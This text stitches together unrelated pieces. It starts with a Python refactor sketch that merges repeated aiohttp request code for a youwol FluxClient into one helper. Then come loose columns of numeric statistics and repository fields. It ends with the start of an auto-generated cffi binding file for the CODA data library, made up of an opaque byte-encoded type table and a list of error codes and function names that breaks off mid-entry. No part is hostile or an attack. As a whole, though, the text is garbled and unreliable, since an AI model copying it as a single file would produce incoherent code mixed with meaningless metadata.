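# Hedged refactor sketch (not part of the youwol client): every method above
# repeats the same open-session / request / status-check / raise sequence, so
# the shared path could be hoisted into a single helper. The name `_request`
# and the use of ClientSession.request() are my choices, not youwol's API.
# ---------------------------------------------------------------------------
async def _request(client: FluxClient, method: str, path: str, **kwargs):
    """One implementation of the pattern repeated in each method above."""
    url = f"{client.url_base}{path}"
    async with aiohttp.ClientSession(headers=client.headers) as session:
        async with session.request(method, url=url, **kwargs) as resp:
            if resp.status == 200:
                return await resp.json()
            await raise_exception_from_response(resp, **kwargs)

# e.g. get_project(project_id) would then reduce to:
#     return await _request(self, "GET", f"/projects/{project_id}", **kwargs)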
| 37.711538
| 80
| 0.601989
| 466
| 3,922
| 4.944206
| 0.122318
| 0.0625
| 0.070313
| 0.101563
| 0.851128
| 0.83724
| 0.83724
| 0.824653
| 0.796007
| 0.796007
| 0
| 0.008743
| 0.300102
| 3,922
| 103
| 81
| 38.07767
| 0.830601
| 0
| 0
| 0.712329
| 0
| 0
| 0.071647
| 0.071647
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.054795
| 0
| 0.219178
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b18e2c1e1539bf650f61c76ac9b2ec2050ba80d
| 23,639
|
py
|
Python
|
python/cffi/_codac.py
|
bambang/coda
|
8c9b61e8cd38fd3d95aae4ff71d8e23b4dcfb65d
|
[
"MIT",
"BSD-3-Clause"
] | 1
|
2021-03-12T12:37:38.000Z
|
2021-03-12T12:37:38.000Z
|
python/cffi/_codac.py
|
bambang/coda
|
8c9b61e8cd38fd3d95aae4ff71d8e23b4dcfb65d
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
python/cffi/_codac.py
|
bambang/coda
|
8c9b61e8cd38fd3d95aae4ff71d8e23b4dcfb65d
|
[
"MIT",
"BSD-3-Clause"
] | null | null | null |
# auto-generated file
import _cffi_backend
ffi = _cffi_backend.FFI('_codac',
_version = 0x2601,
_types = b'\x00\x00\x19\x0D\x00\x00\x01\x0B\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x03\x0B\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x04\x0B\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x05\x0B\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x06\x0B\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x07\x01\x00\x00\x00\x0F\x00\x00\x19\x0D\x00\x00\x00\x0F\x00\x01\xE5\x0D\x00\x00\x00\x0F\x00\x00\x32\x0D\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x2D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x01\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x19\x11\x00\x00\x19\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x19\x11\x00\x00\x19\x11\x00\x00\x07\x01\x00\x00\x64\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x19\x11\x00\x01\xE5\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x19\x11\x00\x00\x10\x03\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x02\x1A\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x28\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x02\x0B\x00\x00\x19\x11\x00\x02\x3D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x00\x07\x01\x00\x00\x19\x03\x00\x00\x46\x03\x00\x00\x4A\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x19\x11\x00\x01\x5A\x03\x00\x00\x04\x03\x00\x00\x4F\x11\x00\x00\x4F\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x2E\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x5C\x11\x00\x00\x19\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x5C\x11\x00\x02\x30\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x5C\x11\x00\x00\x07\x01\x00\x00\x6D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x5C\x11\x00\x00\x09\x01\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x2E\x03\x00\x02\x2D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x71\x11\x00\x00\x00\x0B\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x71\x11\x00\x00\x09\x01\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x19\x11\x00\x00\x6D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x28\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x02\x31\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x2D\x11\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x2D\x11\x00\x00\x2D\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x2D\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x56\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x07\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x0A\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x0D\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x02\x33\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\xB0\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x32\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x1B\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x02\x34\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\xC6\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x02\x35\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\xCF\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x55\x11\x00\x00
\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x02\x36\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\xE1\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\xB0\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\xC6\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\xCF\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x00\xE1\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x02\x3A\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x02\x3B\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x02\x25\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x00\x09\x01\x00\x00\x09\x01\x00\x02\x3C\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x1F\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x1F\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x25\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x25\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x2B\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x2B\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x31\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x31\x11\x00\x00\x76\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x70\x11\x00\x01\x31\x11\x00\x00\x17\x01\x00\x00\x17\x01\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x2F\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x5C\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x70\x11\x00\x00\x71\x03\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x70\x11\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x70\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x70\x11\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x01\x5E\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\x01\x03\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x5E\x11\x00\x00\xC2\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x64\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x64\x11\x00\x00\x19\x11\x00\x00\x09\x01\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x30\x03\x00\x00\x4F\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x8F\x11\x00\x00\x88\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x8F\x11\x00\x00\x56\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x8F\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\x8F\x11\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x02\x32\x03\x00\x00\x4F\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x4F\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x19\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x88\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x56\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\xA4\x11\x00\x00\x0
0\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\xA8\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\xAC\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x32\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x55\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x80\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x09\x01\x00\x00\x4F\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x09\x01\x00\x00\x88\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x01\xA3\x11\x00\x00\x09\x01\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x0E\x01\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x0E\x01\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x0E\x01\x00\x00\x19\x11\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x0E\x01\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x32\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x07\x01\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x19\x11\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x07\x01\x00\x00\x2D\x11\x00\x00\x00\x0F\x00\x00\x10\x0D\x00\x00\x00\x0F\x00\x00\x6D\x0D\x00\x00\x07\x01\x00\x00\x69\x11\x00\x00\x09\x01\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x02\x2F\x03\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x00\x0E\x01\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x00\x17\x01\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x00\x18\x01\x00\x00\x71\x11\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x00\x4A\x11\x00\x00\x00\x0F\x00\x02\x3D\x0D\x00\x00\x00\x0F\x00\x00\x02\x01\x00\x00\x01\x09\x00\x00\x04\x09\x00\x00\x02\x09\x00\x02\x32\x03\x00\x00\x03\x09\x00\x00\x0D\x01\x00\x00\x13\x01\x00\x00\x15\x01\x00\x00\x11\x01\x00\x00\x00\x09\x00\x02\x37\x05\x00\x00\x00\x08\x00\x00\x14\x01\x00\x00\x16\x01\x00\x00\x12\x01\x00\x00\x00\x01',
_globals = (b'\xFF\xFF\xFF\x1FCODA_ERROR_ARRAY_NUM_DIMS_MISMATCH',-106,b'\xFF\xFF\xFF\x1FCODA_ERROR_ARRAY_OUT_OF_BOUNDS',-107,b'\xFF\xFF\xFF\x1FCODA_ERROR_DATA_DEFINITION',-400,b'\xFF\xFF\xFF\x1FCODA_ERROR_EXPRESSION',-401,b'\xFF\xFF\xFF\x1FCODA_ERROR_FILE_NOT_FOUND',-20,b'\xFF\xFF\xFF\x1FCODA_ERROR_FILE_OPEN',-21,b'\xFF\xFF\xFF\x1FCODA_ERROR_FILE_READ',-22,b'\xFF\xFF\xFF\x1FCODA_ERROR_FILE_WRITE',-23,b'\xFF\xFF\xFF\x1FCODA_ERROR_HDF4',-10,b'\xFF\xFF\xFF\x1FCODA_ERROR_HDF5',-12,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_ARGUMENT',-100,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_DATETIME',-104,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_FORMAT',-103,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_INDEX',-101,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_NAME',-102,b'\xFF\xFF\xFF\x1FCODA_ERROR_INVALID_TYPE',-105,b'\xFF\xFF\xFF\x1FCODA_ERROR_NO_HDF4_SUPPORT',-11,b'\xFF\xFF\xFF\x1FCODA_ERROR_NO_HDF5_SUPPORT',-13,b'\xFF\xFF\xFF\x1FCODA_ERROR_NO_PARENT',-108,b'\xFF\xFF\xFF\x1FCODA_ERROR_OUT_OF_BOUNDS_READ',-301,b'\xFF\xFF\xFF\x1FCODA_ERROR_OUT_OF_MEMORY',-1,b'\xFF\xFF\xFF\x1FCODA_ERROR_PRODUCT',-300,b'\xFF\xFF\xFF\x1FCODA_ERROR_UNSUPPORTED_PRODUCT',-200,b'\xFF\xFF\xFF\x1FCODA_ERROR_XML',-14,b'\xFF\xFF\xFF\x1FCODA_MAX_NUM_DIMS',8,b'\xFF\xFF\xFF\x1FCODA_SUCCESS',0,b'\xFF\xFF\xFF\x1FMAX_NUM_DIMS',8,b'\x00\x00\x14\x23coda_MinInf',0,b'\x00\x00\x14\x23coda_NaN',0,b'\x00\x00\x14\x23coda_PlusInf',0,b'\xFF\xFF\xFF\x0Bcoda_array_class',1,b'\xFF\xFF\xFF\x0Bcoda_array_ordering_c',0,b'\xFF\xFF\xFF\x0Bcoda_array_ordering_fortran',1,b'\x00\x02\x14\x23coda_c_index_to_fortran_index',0,b'\x00\x01\x85\x23coda_close',0,b'\x00\x00\xBB\x23coda_cursor_get_array_dim',0,b'\x00\x00\xE8\x23coda_cursor_get_available_union_field_index',0,b'\x00\x00\xD6\x23coda_cursor_get_bit_size',0,b'\x00\x00\xD6\x23coda_cursor_get_byte_size',0,b'\x00\x00\xB7\x23coda_cursor_get_depth',0,b'\x00\x00\xD6\x23coda_cursor_get_file_bit_offset',0,b'\x00\x00\xD6\x23coda_cursor_get_file_byte_offset',0,b'\x00\x00\x9E\x23coda_cursor_get_format',0,b'\x00\x00\xE8\x23coda_cursor_get_index',0,b'\x00\x00\xE8\x23coda_cursor_get_num_elements',0,b'\x00\x00\x82\x23coda_cursor_get_product_file',0,b'\x00\x00\xA2\x23coda_cursor_get_read_type',0,b'\x00\x00\xEC\x23coda_cursor_get_record_field_available_status',0,b'\x00\x00\x7D\x23coda_cursor_get_record_field_index_from_name',0,b'\x00\x00\xA6\x23coda_cursor_get_special_type',0,b'\x00\x00\xE8\x23coda_cursor_get_string_length',0,b'\x00\x00\x86\x23coda_cursor_get_type',0,b'\x00\x00\xAA\x23coda_cursor_get_type_class',0,b'\x00\x00\x5E\x23coda_cursor_goto',0,b'\x00\x00\x66\x23coda_cursor_goto_array_element',0,b'\x00\x00\x6B\x23coda_cursor_goto_array_element_by_index',0,b'\x00\x00\x5B\x23coda_cursor_goto_attributes',0,b'\x00\x00\x5B\x23coda_cursor_goto_available_union_field',0,b'\x00\x00\x5B\x23coda_cursor_goto_first_array_element',0,b'\x00\x00\x5B\x23coda_cursor_goto_first_record_field',0,b'\x00\x00\x5B\x23coda_cursor_goto_next_array_element',0,b'\x00\x00\x5B\x23coda_cursor_goto_next_record_field',0,b'\x00\x00\x5B\x23coda_cursor_goto_parent',0,b'\x00\x00\x6B\x23coda_cursor_goto_record_field_by_index',0,b'\x00\x00\x5E\x23coda_cursor_goto_record_field_by_name',0,b'\x00\x00\x5B\x23coda_cursor_goto_root',0,b'\x00\x00\xB7\x23coda_cursor_has_ascii_content',0,b'\x00\x00\xB7\x23coda_cursor_has_attributes',0,b'\x00\x00\xC0\x23coda_cursor_print_path',0,b'\x00\x01\x57\x23coda_cursor_read_bits',0,b'\x00\x01\x57\x23coda_cursor_read_bytes',0,b'\x00\x00\x6F\x23coda_cursor_read_char',0,b'\x00\x00\x73\x23coda_cursor_read_char_array',0,b'\x00\x00\xF1\x23coda_cursor_read_char_part
ial_array',0,b'\x00\x00\x8A\x23coda_cursor_read_complex_double_pair',0,b'\x00\x00\x99\x23coda_cursor_read_complex_double_pairs_array',0,b'\x00\x00\x8E\x23coda_cursor_read_complex_double_split',0,b'\x00\x00\x93\x23coda_cursor_read_complex_double_split_array',0,b'\x00\x00\x8A\x23coda_cursor_read_double',0,b'\x00\x00\x99\x23coda_cursor_read_double_array',0,b'\x00\x00\xF7\x23coda_cursor_read_double_partial_array',0,b'\x00\x00\xAE\x23coda_cursor_read_float',0,b'\x00\x00\xB2\x23coda_cursor_read_float_array',0,b'\x00\x00\xFD\x23coda_cursor_read_float_partial_array',0,b'\x00\x00\xC4\x23coda_cursor_read_int16',0,b'\x00\x00\xC8\x23coda_cursor_read_int16_array',0,b'\x00\x01\x03\x23coda_cursor_read_int16_partial_array',0,b'\x00\x00\xCD\x23coda_cursor_read_int32',0,b'\x00\x00\xD1\x23coda_cursor_read_int32_array',0,b'\x00\x01\x09\x23coda_cursor_read_int32_partial_array',0,b'\x00\x00\xD6\x23coda_cursor_read_int64',0,b'\x00\x00\xDA\x23coda_cursor_read_int64_array',0,b'\x00\x01\x0F\x23coda_cursor_read_int64_partial_array',0,b'\x00\x00\xDF\x23coda_cursor_read_int8',0,b'\x00\x00\xE3\x23coda_cursor_read_int8_array',0,b'\x00\x01\x15\x23coda_cursor_read_int8_partial_array',0,b'\x00\x00\x78\x23coda_cursor_read_string',0,b'\x00\x01\x33\x23coda_cursor_read_uint16',0,b'\x00\x01\x37\x23coda_cursor_read_uint16_array',0,b'\x00\x01\x1B\x23coda_cursor_read_uint16_partial_array',0,b'\x00\x01\x3C\x23coda_cursor_read_uint32',0,b'\x00\x01\x40\x23coda_cursor_read_uint32_array',0,b'\x00\x01\x21\x23coda_cursor_read_uint32_partial_array',0,b'\x00\x01\x45\x23coda_cursor_read_uint64',0,b'\x00\x01\x49\x23coda_cursor_read_uint64_array',0,b'\x00\x01\x27\x23coda_cursor_read_uint64_partial_array',0,b'\x00\x01\x4E\x23coda_cursor_read_uint8',0,b'\x00\x01\x52\x23coda_cursor_read_uint8_array',0,b'\x00\x01\x2D\x23coda_cursor_read_uint8_partial_array',0,b'\x00\x00\x62\x23coda_cursor_set_product',0,b'\x00\x00\x5B\x23coda_cursor_use_base_type_of_special_type',0,b'\x00\x02\x08\x23coda_datetime_to_double',0,b'\x00\x02\x2B\x23coda_done',0,b'\x00\x01\xF0\x23coda_double_to_datetime',0,b'\x00\x01\xF0\x23coda_double_to_utcdatetime',0,b'\x00\x00\x0F\x23coda_errno_to_string',0,b'\xFF\xFF\xFF\x0Bcoda_expression_boolean',0,b'\x00\x02\x19\x23coda_expression_delete',0,b'\x00\x01\x6F\x23coda_expression_eval_bool',0,b'\x00\x01\x6A\x23coda_expression_eval_float',0,b'\x00\x01\x74\x23coda_expression_eval_integer',0,b'\x00\x01\x60\x23coda_expression_eval_node',0,b'\x00\x01\x64\x23coda_expression_eval_string',0,b'\xFF\xFF\xFF\x0Bcoda_expression_float',2,b'\x00\x00\x3A\x23coda_expression_from_string',0,b'\x00\x01\x7D\x23coda_expression_get_type',0,b'\x00\x00\x00\x23coda_expression_get_type_name',0,b'\xFF\xFF\xFF\x0Bcoda_expression_integer',1,b'\x00\x01\x5D\x23coda_expression_is_constant',0,b'\x00\x01\x79\x23coda_expression_is_equal',0,b'\xFF\xFF\xFF\x0Bcoda_expression_node',4,b'\x00\x01\x81\x23coda_expression_print',0,b'\xFF\xFF\xFF\x0Bcoda_expression_string',3,b'\xFF\xFF\xFF\x0Bcoda_expression_void',5,b'\xFF\xFF\xFF\x0Bcoda_ffs_could_not_access_directory',2,b'\xFF\xFF\xFF\x0Bcoda_ffs_could_not_open_file',1,b'\xFF\xFF\xFF\x0Bcoda_ffs_error',0,b'\xFF\xFF\xFF\x0Bcoda_ffs_match',4,b'\xFF\xFF\xFF\x0Bcoda_ffs_no_match',5,b'\xFF\xFF\xFF\x0Bcoda_ffs_unsupported_file',3,b'\xFF\xFF\xFF\x0Bcoda_format_ascii',0,b'\xFF\xFF\xFF\x0Bcoda_format_binary',1,b'\xFF\xFF\xFF\x0Bcoda_format_cdf',5,b'\xFF\xFF\xFF\x0Bcoda_format_grib',7,b'\xFF\xFF\xFF\x0Bcoda_format_hdf4',3,b'\xFF\xFF\xFF\x0Bcoda_format_hdf5',4,b'\xFF\xFF\xFF\x0Bcoda_format_netcdf',6,b'\xFF\xFF\xFF\x0Bcoda_format_rinex',
8,b'\xFF\xFF\xFF\x0Bcoda_format_sp3',9,b'\xFF\xFF\xFF\x0Bcoda_format_xml',2,b'\x00\x02\x28\x23coda_free',0,b'\x00\x00\x16\x23coda_get_errno',0,b'\x00\x00\x12\x23coda_get_libcoda_version',0,b'\x00\x02\x12\x23coda_get_option_bypass_special_types',0,b'\x00\x02\x12\x23coda_get_option_perform_boundary_checks',0,b'\x00\x02\x12\x23coda_get_option_perform_conversions',0,b'\x00\x02\x12\x23coda_get_option_use_fast_size_expressions',0,b'\x00\x02\x12\x23coda_get_option_use_mmap',0,b'\x00\x01\x8E\x23coda_get_product_class',0,b'\x00\x01\x8E\x23coda_get_product_definition_file',0,b'\x00\x01\x9E\x23coda_get_product_file_size',0,b'\x00\x01\x8E\x23coda_get_product_filename',0,b'\x00\x01\x96\x23coda_get_product_format',0,b'\x00\x01\x92\x23coda_get_product_root_type',0,b'\x00\x01\x8E\x23coda_get_product_type',0,b'\x00\x01\x88\x23coda_get_product_variable_value',0,b'\x00\x01\x9A\x23coda_get_product_version',0,b'\x00\x02\x12\x23coda_init',0,b'\xFF\xFF\xFF\x0Bcoda_integer_class',2,b'\x00\x01\xE4\x23coda_isInf',0,b'\x00\x01\xE4\x23coda_isMinInf',0,b'\x00\x01\xE4\x23coda_isNaN',0,b'\x00\x01\xE4\x23coda_isPlusInf',0,b'\x00\x00\x4C\x23coda_match_filefilter',0,b'\xFF\xFF\xFF\x0Bcoda_native_type_bytes',12,b'\xFF\xFF\xFF\x0Bcoda_native_type_char',10,b'\xFF\xFF\xFF\x0Bcoda_native_type_double',9,b'\xFF\xFF\xFF\x0Bcoda_native_type_float',8,b'\xFF\xFF\xFF\x0Bcoda_native_type_int16',2,b'\xFF\xFF\xFF\x0Bcoda_native_type_int32',4,b'\xFF\xFF\xFF\x0Bcoda_native_type_int64',6,b'\xFF\xFF\xFF\x0Bcoda_native_type_int8',0,b'\xFF\xFF\xFF\x0Bcoda_native_type_not_available',-1,b'\xFF\xFF\xFF\x0Bcoda_native_type_string',11,b'\xFF\xFF\xFF\x0Bcoda_native_type_uint16',3,b'\xFF\xFF\xFF\x0Bcoda_native_type_uint32',5,b'\xFF\xFF\xFF\x0Bcoda_native_type_uint64',7,b'\xFF\xFF\xFF\x0Bcoda_native_type_uint8',1,b'\x00\x00\x3E\x23coda_open',0,b'\x00\x00\x23\x23coda_open_as',0,b'\xFF\xFF\xFF\x0Bcoda_raw_class',5,b'\xFF\xFF\xFF\x0Bcoda_real_class',3,b'\x00\x00\x53\x23coda_recognize_file',0,b'\xFF\xFF\xFF\x0Bcoda_record_class',0,b'\x00\x00\x18\x23coda_set_definition_path',0,b'\x00\x00\x1E\x23coda_set_definition_path_conditional',0,b'\x00\x01\xFA\x23coda_set_option_bypass_special_types',0,b'\x00\x01\xFA\x23coda_set_option_perform_boundary_checks',0,b'\x00\x01\xFA\x23coda_set_option_perform_conversions',0,b'\x00\x01\xFA\x23coda_set_option_use_fast_size_expressions',0,b'\x00\x01\xFA\x23coda_set_option_use_mmap',0,b'\xFF\xFF\xFF\x0Bcoda_special_class',6,b'\xFF\xFF\xFF\x0Bcoda_special_complex',3,b'\xFF\xFF\xFF\x0Bcoda_special_no_data',0,b'\xFF\xFF\xFF\x0Bcoda_special_time',2,b'\xFF\xFF\xFF\x0Bcoda_special_vsf_integer',1,b'\x00\x02\x20\x23coda_str64',0,b'\x00\x02\x24\x23coda_str64u',0,b'\x00\x02\x1C\x23coda_strfl',0,b'\x00\x00\x42\x23coda_string_to_time',0,b'\xFF\xFF\xFF\x0Bcoda_text_class',4,b'\x00\x01\xF0